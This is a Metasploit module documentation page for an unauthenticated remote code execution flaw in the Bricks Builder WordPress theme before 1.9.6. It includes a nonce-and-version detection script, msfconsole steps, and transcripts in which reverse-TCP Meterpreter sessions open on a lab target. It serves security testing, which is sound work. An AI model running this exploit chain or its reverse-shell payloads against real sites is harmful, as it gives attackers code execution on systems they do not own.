metasploit-gs/documentation/modules/exploit/multi/http/wp_bricks_builder_rce.md
## Vulnerable Application
This Metasploit module exploits a remote code execution vulnerability in the Bricks Builder Theme for WordPress, versions prior to 1.9.6.
The theme embeds a WordPress nonce in the public front-end pages it renders, and then accepts that same nonce as the only
authorization check on a server-side rendering request whose input ends up in an `eval()` call. A nonce is a CSRF token, not a
credential: any unauthenticated visitor can read it from the page source, replay it, and have arbitrary PHP executed with the
privileges of the web server user.
To replicate a vulnerable environment for testing:
1. Install WordPress.
2. Download and install the Bricks Builder Theme, ensuring the version is below 1.9.6.
3. Activate Bricks Builder.
4. Create a page using the default template and add a few Bricks elements to it, so that the nonce is emitted on index.php (the module retrieves it from there).
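As an added illustration of the two conditions the module's automatic check depends on, here is a small stand-alone Ruby script. It is not code from the Metasploit module or from the Bricks theme: it takes the HTML of a front-end page, reads the theme version from the enqueued stylesheet URL and the nonce from the inline settings blob, and compares the version against 1.9.6. The sample HTML is constructed; the `?ver=` query string and the `bricksData` / `"nonce"` layout are assumptions about how the theme emits these values, and the `assess`, `extract_nonce` and `extract_theme_version` names are the example's own.

```ruby
# Added example (not part of the Metasploit module or the Bricks theme): an
# offline version of the two checks implied by the description above,
# (1) is the reported theme version below the fixed release, and
# (2) does the public front page leak the nonce that gates the render request.
# SAMPLE_HTML is constructed test input; the stylesheet "?ver=" query string and
# the bricksData/"nonce" shape are assumptions, not something this page documents.

FIXED_VERSION = Gem::Version.new('1.9.6') # first non-vulnerable release per the text above

# True when the version string parses and is strictly below the fixed release.
# An unparsable string is reported as not vulnerable rather than guessed at.
def vulnerable_version?(version)
  Gem::Version.new(version) < FIXED_VERSION
rescue ArgumentError
  false
end

# Theme version as exposed by a URL such as
# .../themes/bricks/assets/css/frontend.min.css?ver=1.8 (assumed format).
def extract_theme_version(html)
  m = html.match(%r{/themes/bricks/[^"']*\?ver=([0-9]+(?:\.[0-9]+)*)})
  m && m[1]
end

# Nonce as exposed inside the inline bricksData JSON blob (assumed shape).
def extract_nonce(html)
  m = html.match(/"nonce"\s*:\s*"([0-9a-f]+)"/i)
  m && m[1]
end

# :vulnerable when the version is below the fix AND a nonce is readable,
# :unknown when no version could be read (verify by hand), :safe otherwise.
def assess(html)
  version = extract_theme_version(html)
  nonce = extract_nonce(html)
  return { status: :unknown, version: nil, nonce: nonce } unless version

  status = vulnerable_version?(version) && nonce ? :vulnerable : :safe
  { status: status, version: version, nonce: nonce }
end

# Constructed front-page excerpt modelled on the lab target used in the scenarios.
SAMPLE_HTML = <<~HTML
  <!DOCTYPE html>
  <html><head>
  <link rel="stylesheet" href="http://localhost:8888/wp-content/themes/bricks/assets/css/frontend.min.css?ver=1.8">
  <script id="bricks-scripts-js-extra">
  var bricksData = {"ajaxUrl":"http:\\/\\/localhost:8888\\/wp-admin\\/admin-ajax.php","nonce":"953563d296","postId":"2"};
  </script>
  </head><body><div class="brxe-container">hello</div></body></html>
HTML

if __FILE__ == $0
  puts assess(SAMPLE_HTML).inspect
end
```

For a live target, replace `SAMPLE_HTML` with the body of a GET to the site root (the same page the module reads the nonce from). Treat `:unknown` as "verify manually", not as safe: a site that strips `?ver=` from asset URLs still leaks the nonce, and the nonce alone is what the attack needs.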
## Verification Steps
1. Set up a WordPress instance with the Bricks Builder Theme (version < 1.9.6).
2. Launch `msfconsole` in your Metasploit framework.
3. Use the module: `use exploit/multi/http/wp_bricks_builder_rce`.
4. Set `RHOSTS` to the local IP address or hostname of the target.
5. Configure necessary options such as `TARGETURI`, `SSL`, and `RPORT`.
6. Execute the exploit using the `run` or `exploit` command.
7. If the target is vulnerable, the module will execute the specified payload.
## Options
This module has no options of its own; it uses only the standard HTTP client options (`RHOSTS`, `RPORT`, `SSL`, `TARGETURI`, `VHOST`, `Proxies`) plus those of the selected payload.
## Scenarios
### Successful Exploitation Against Local WordPress with Bricks Builder Theme 1.8
**Setup**:
- Local WordPress instance with Bricks Builder Theme version 1.8.
- Metasploit Framework.
**Steps**:
1. Start `msfconsole`.
2. Load the module:
```
use exploit/multi/http/wp_bricks_builder_rce
```
3. Set `RHOSTS` to the local IP (e.g., 192.168.1.10).
4. Configure other necessary options (TARGETURI, SSL, etc.).
5. Launch the exploit:
```
exploit
```
**Expected Results**:
- The module attempts to retrieve the nonce from the target's front page.
- It then sends the payload in a request that the server passes to `eval()`.
- If successful, a session is opened on the target running as the web server's user; whether that is a Meterpreter session or a plain command shell depends on the payload used.
**Example**:
With `cmd/linux/http/x64/meterpreter/reverse_tcp`:
```
msf > search bricks

Matching Modules
================

   #  Name                                      Disclosure Date  Rank       Check  Description
   -  ----                                      ---------------  ----       -----  -----------
   0  exploit/multi/http/wp_bricks_builder_rce  2024-02-19       excellent  Yes    Unauthenticated RCE in Bricks Builder Theme


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/wp_bricks_builder_rce

msf > use 0
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(multi/http/wp_bricks_builder_rce) > options

Module options (exploit/multi/http/wp_bricks_builder_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI path to WordPress
   VHOST                       no        HTTP server virtual host

Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      ilPaBylkCKr      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
   LHOST               192.168.1.5      yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic


View the full module info with the info, or info -d command.

msf exploit(multi/http/wp_bricks_builder_rce) > set ssl false
[!] Changing the SSL option's value may require changing RPORT!
ssl => false
msf exploit(multi/http/wp_bricks_builder_rce) > set rhosts localhost
rhosts => localhost
msf exploit(multi/http/wp_bricks_builder_rce) > set rport 8888
rport => 8888
msf exploit(multi/http/wp_bricks_builder_rce) > exploit

[*] Started reverse TCP handler on 192.168.1.5:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Nonce retrieved: 953563d296
[*] Sending stage (3045380 bytes) to 172.20.0.2
[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 172.20.0.2:39856) at 2024-02-26 21:51:11 +0100

meterpreter > sysinfo
Computer     : 172.20.0.2
OS           : Debian 11.8 (Linux 6.4.10-060410-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```
With `php/meterpreter/reverse_tcp`:
```
msf exploit(multi/http/wp_bricks_builder_rce) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/http/wp_bricks_builder_rce) > exploit

[*] Started reverse TCP handler on 192.168.1.5:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Nonce retrieved: 953563d296
[*] Sending stage (39927 bytes) to 172.20.0.2
[*] Meterpreter session 2 opened (192.168.1.5:4444 -> 172.20.0.2:49678) at 2024-02-26 22:02:56 +0100

meterpreter > sysinfo
Computer    : 65e1e703e433
OS          : Linux 65e1e703e433 6.4.10-060410-generic #202308111154 SMP PREEMPT_DYNAMIC Fri Aug 11 12:00:45 UTC 2023 x86_64
Meterpreter : php/linux
meterpreter >
```